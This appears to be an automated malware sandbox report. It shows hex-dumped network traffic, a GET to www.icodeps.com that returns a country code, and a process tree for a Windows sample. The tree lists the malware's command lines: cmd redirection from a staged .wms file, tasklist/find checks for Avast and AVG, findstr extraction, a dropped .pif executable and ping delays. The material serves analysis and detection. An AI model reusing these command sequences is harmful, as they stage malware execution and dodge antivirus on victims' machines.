                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16312INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16328INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16344INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16360INData Raw: 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00
                                                                                                                                                                                                                                    Data Ascii: """""""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16376INData Raw: ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16392INData Raw: ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16408INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16424INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16440INData Raw: 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22
                                                                                                                                                                                                                                    Data Ascii: """""""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16456INData Raw: 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22
                                                                                                                                                                                                                                    Data Ascii: """""""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16472INData Raw: ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16488INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16504INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16520INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16536INData Raw: fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00
                                                                                                                                                                                                                                    Data Ascii: """"""""""""
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16552INData Raw: ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ff 00 00 22 00 01 80 22 00 00 80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                    Data Ascii: """"""""""""


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    9192.168.11.2049855149.28.253.196443C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16565OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                                                                                                                                                                    Host: www.icodeps.com
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:28 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 2
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16565INData Raw: 55 53
                                                                                                                                                                                                                                    Data Ascii: US


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                    Start time:07:09:21
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\l39HA25qjw.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\l39HA25qjw.exe
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:817664 bytes
                                                                                                                                                                                                                                    MD5 hash:5417B1CA4DA061FC9BB034627FBBDA40
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:07:09:22
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\at.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:at 3874982763784yhwgdfg78234789s42809374918uf
                                                                                                                                                                                                                                    Imagebase:0x6a0000
                                                                                                                                                                                                                                    File size:25088 bytes
                                                                                                                                                                                                                                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:07:09:22
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6054b0000
                                                                                                                                                                                                                                    File size:875008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:07:09:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd /c cmd < Virtual.wms & ping -n 5 localhost
                                                                                                                                                                                                                                    Imagebase:0x9c0000
                                                                                                                                                                                                                                    File size:236544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:07:09:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6054b0000
                                                                                                                                                                                                                                    File size:875008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:07:09:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd
                                                                                                                                                                                                                                    Imagebase:0x9c0000
                                                                                                                                                                                                                                    File size:236544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:07:09:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist /FI "imagename eq AvastUI.exe"
                                                                                                                                                                                                                                    Imagebase:0x340000
                                                                                                                                                                                                                                    File size:79360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:07:09:24
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:find /I /N "avastui.exe"
                                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                                    File size:14848 bytes
                                                                                                                                                                                                                                    MD5 hash:31D06677CD9ACA84EA2E2E8E3BF22D65
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:07:09:24
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist /FI "imagename eq AVGUI.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff7b3cf0000
                                                                                                                                                                                                                                    File size:79360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:07:09:24
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:find /I /N "avgui.exe"
                                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                                    File size:14848 bytes
                                                                                                                                                                                                                                    MD5 hash:31D06677CD9ACA84EA2E2E8E3BF22D65
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:07:09:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /V /R "^xAuYKKZEsy$" Similarly.wms
                                                                                                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                                                                                                    File size:29696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:07:09:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:Fuck.exe.pif h
                                                                                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                                                                                    File size:946776 bytes
                                                                                                                                                                                                                                    MD5 hash:6987E4CD3F256462F422326A7EF115B9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                    • Detection: 4%, Metadefender, Browse

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:07:09:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:ping localhost -n 5
                                                                                                                                                                                                                                    Imagebase:0xca0000
                                                                                                                                                                                                                                    File size:18944 bytes
